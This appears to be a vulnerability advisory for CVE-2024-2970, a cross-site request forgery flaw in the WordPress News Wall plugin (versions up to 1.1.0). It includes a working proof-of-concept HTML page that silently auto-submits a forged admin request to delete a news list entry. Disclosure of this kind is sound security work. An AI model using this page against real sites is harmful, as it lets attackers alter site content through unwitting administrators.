CVE-2024-2970

Description

The News Wall plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing or incorrect nonce validation on the nwap_newslist_page() function. This makes it possible for unauthenticated attackers to update the plugin’s settings and modify news lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Severity

4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Affected Version

<= 1.1.0

PoC :

<html>
  <!-- Made By Eneriiiiii -->
  <body>
    <form action="http://[assets]/wp-admin/admin.php">
      <input type="hidden" name="page" value="nw&#95;newslist&#95;page" />
      <input type="hidden" name="action" value="del" />
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="confirm" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Reference

• https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/news-wall/news-wall-110-cross-site-request-forgery-to-plugin-settings-update
• https://plugins.trac.wordpress.org/browser/news-wall/trunk/plugin-panel.php
• https://nvd.nist.gov/vuln/detail/CVE-2024-2970